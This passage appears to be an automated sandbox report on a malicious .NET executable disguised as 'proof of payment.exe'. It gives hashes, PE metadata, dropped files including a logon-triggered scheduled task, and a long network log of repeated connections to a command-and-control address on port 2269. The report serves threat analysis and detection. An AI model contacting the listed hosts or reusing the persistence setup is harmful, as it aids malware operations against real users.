                                    SHA-256:10B5B0FB86E77C0EF27565A750B6D7931599F18C2D5E7700EE81D75E92ED47F0
                                    SHA-512:479D08B7F062092B194FD9F50367DFB530136736DA9111DBCA663F23E5D1AEF1F64700CEE450C0E270186D9EA6D31309D1B6074C344D3F1BC70C815174F02958
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                    Process:C:\Users\user\Desktop\proof of payment.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                    Category:dropped
                                    Size (bytes):2
                                    Entropy (8bit):1.0
                                    Encrypted:false
                                    SSDEEP:3:Qn:Qn
                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                    Malicious:false
                                    Preview:..
                                    Process:C:\Users\user\Desktop\proof of payment.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):927744
                                    Entropy (8bit):7.981237466402019
                                    Encrypted:false
                                    SSDEEP:12288:ppB778QH0fay4iJDieHNq5lVnsUc/Nb2JF5xXwGp94GEXHMY1E7LgHPPkqM7E6:bBWkithtq5jsT/9mb9PUsv7LMPZM7E6
                                    MD5:931254205CD64AD16B18FC9B318E2CA6
                                    SHA1:4E5C18FCBF06212D952E084B1B455ECC136E4845
                                    SHA-256:05A341A2577C728E8A994775B17B8C5562539146D78A5DE948E3534E1AE1C629
                                    SHA-512:D6464E122E6EB02D0D32DEC6866555BCFE1B644382EDA79B6242F93B39DF70071A9EB92C66817E2C1CF2D0B7A7BDF09C12B52E21471E56B2BF4AC7C3745332D9
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 61%
                                    • Antivirus: Virustotal, Detection: 56%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....//f..............0..............2... ...@....@.. ....................................@..................................2..O....@..@....................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\proof of payment.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.981237466402019
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    File name:proof of payment.exe
                                    File size:927'744 bytes
                                    MD5:931254205cd64ad16b18fc9b318e2ca6
                                    SHA1:4e5c18fcbf06212d952e084b1b455ecc136e4845
                                    SHA256:05a341a2577c728e8a994775b17b8c5562539146d78a5de948e3534e1ae1c629
                                    SHA512:d6464e122e6eb02d0d32dec6866555bcfe1b644382eda79b6242f93b39df70071a9eb92c66817e2c1cf2d0b7a7bdf09c12b52e21471e56b2bf4ac7c3745332d9
                                    SSDEEP:12288:ppB778QH0fay4iJDieHNq5lVnsUc/Nb2JF5xXwGp94GEXHMY1E7LgHPPkqM7E6:bBWkithtq5jsT/9mb9PUsv7LMPZM7E6
                                    TLSH:1B1523809058BBF1E57E4F762A6F0D9D4BA930191A41E3DE88A371DCCD927125F6332D
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....//f..............0..............2... ...@....@.. ....................................@................................
                                    Icon Hash:0888742406740004
                                    Entrypoint:0x4e32fe
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x662F2FC6 [Mon Apr 29 05:27:34 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                    Instruction
                                    jmp dword ptr [00402000h]
                                    inc ebx
                                    aaa
                                    xor eax, 52384335h
                                    pop edx
                                    dec eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [edx+39h], cl
                                    inc ebp
                                    pop edx
                                    dec eax
                                    xor eax, 34383234h
                                    xor al, 35h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe32ac | 0x4f | .text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe4000 | 0x940 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe6000 | 0xc | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x2000 | 0xe1324 | 0xe1400 | 625753356e847ffa09b8eee80d37a380 | False | 0.9814095449500555 | data | 7.988023924339669 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc | 0xe4000 | 0x940 | 0xc00 | 9c0ca3371346327245169ffd5a590dea | False | 0.4339192708333333 | data | 4.3919687192927785 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0xe6000 | 0xc | 0x400 | e1ab53fd273aeb9ec85d799c1175b545 | False | 0.0234375 | data | 0.04468700625387198 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0xe40c8 | 0x51d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.679144385026738
                                    RT_GROUP_ICON | 0xe45f8 | 0x14 | data | | | 1.05
                                    RT_VERSION | 0xe461c | 0x320 | data | | | 0.4525
                                    DLL | Import
                                    mscoree.dll | _CorExeMain
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    May 3, 2024 13:13:19.155654907 CEST | 49708 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:20.108767033 CEST | 2269 | 49708 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:20.108860970 CEST | 49708 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:20.115616083 CEST | 49708 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:20.952080011 CEST | 2269 | 49708 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:21.006019115 CEST | 49708 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:21.965723991 CEST | 2269 | 49708 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:22.146572113 CEST | 49708 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:22.394377947 CEST | 49708 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:23.299460888 CEST | 2269 | 49708 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:23.299518108 CEST | 49708 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:24.173415899 CEST | 2269 | 49708 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:24.266639948 CEST | 2269 | 49708 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:24.271979094 CEST | 49708 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:25.293363094 CEST | 2269 | 49708 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:25.295919895 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:25.297943115 CEST | 49713 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:25.317323923 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:25.334069014 CEST | 49708 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:26.119453907 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50
                                    May 3, 2024 13:13:26.285419941 CEST | 80 | 49715 | 178.237.33.50 | 192.168.2.9
                                    May 3, 2024 13:13:26.285545111 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50
                                    May 3, 2024 13:13:26.285801888 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50
                                    May 3, 2024 13:13:26.302885056 CEST | 49713 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:26.302921057 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:26.318502903 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:26.367510080 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:26.367533922 CEST | 2269 | 49713 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:26.367583036 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:26.367659092 CEST | 49713 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:26.367683887 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:26.367760897 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:26.371629953 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:26.373712063 CEST | 49713 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:26.375463963 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:26.457278967 CEST | 80 | 49715 | 178.237.33.50 | 192.168.2.9
                                    May 3, 2024 13:13:26.457345009 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50
                                    May 3, 2024 13:13:26.485361099 CEST | 49708 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:27.364464045 CEST | 2269 | 49713 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:27.364535093 CEST | 49713 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:27.372416973 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:27.372436047 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:27.372504950 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:27.372667074 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:27.466854095 CEST | 80 | 49715 | 178.237.33.50 | 192.168.2.9
                                    May 3, 2024 13:13:27.466948032 CEST | 49715 | 80 | 192.168.2.9 | 178.237.33.50
                                    May 3, 2024 13:13:27.695055962 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:27.695080996 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:27.695096016 CEST | 2269 | 49713 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:27.740385056 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:27.740386009 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:27.740607977 CEST | 49713 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:28.052865982 CEST | 49708 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:28.881650925 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:28.882606983 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:28.883423090 CEST | 2269 | 49713 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:28.886142969 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:28.887096882 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:28.892221928 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:28.895014048 CEST | 49713 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:28.899012089 CEST | 49713 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:29.220452070 CEST | 2269 | 49708 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:30.254632950 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:30.254659891 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:30.254771948 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:30.293034077 CEST | 2269 | 49713 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:30.293251038 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:30.293311119 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:30.293322086 CEST | 2269 | 49713 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:30.293375969 CEST | 49713 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:31.223557949 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:31.223694086 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:31.244709015 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:31.244834900 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:31.292321920 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:31.292474985 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:31.318264961 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:31.319837093 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:31.319916010 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:31.322619915 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:31.325665951 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:31.325711966 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:33.753019094 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:33.753035069 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:33.753098965 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:33.753138065 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:33.753138065 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:33.755951881 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:33.760871887 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:33.776591063 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:33.777543068 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:33.782079935 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:33.782094955 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:33.782154083 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:33.785209894 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:33.785264969 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.087831974 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.089206934 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.089277029 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.089277029 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.095550060 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.095567942 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.095628977 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.095657110 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.104512930 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.108592987 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.108654976 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.111700058 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.122750998 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.122863054 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.123023033 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.123111963 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.123158932 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.124897003 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.125756025 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.125819921 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.127856016 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.129616976 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.129667044 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.131620884 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.133733034 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.133805990 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.749852896 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.749876976 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.749952078 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.749991894 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.749993086 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.757194996 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.757260084 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.757348061 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.757395029 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.767230988 CEST | 2269 | 49714 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.767275095 CEST | 49714 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.798962116 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.800756931 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.800802946 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.804766893 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.807629108 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.807672977 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.810456991 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.813493967 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.813544035 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.818759918 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.819701910 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.819741011 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.821352959 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.823710918 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.823750973 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.825653076 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.826594114 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.826633930 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.828541040 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.829435110 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.829489946 CEST | 49712 | 2269 | 192.168.2.9 | 37.120.235.122
                                    May 3, 2024 13:13:34.832665920 CEST | 2269 | 49712 | 37.120.235.122 | 192.168.2.9
                                    May 3, 2024 13:13:34.838850021 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.838891029 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.840503931 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.841635942 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.841680050 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.845781088 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.847659111 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.847702980 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.848485947 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.849654913 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.849695921 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:34.851459980 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.854656935 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:34.854701996 CEST497122269192.168.2.937.120.235.122
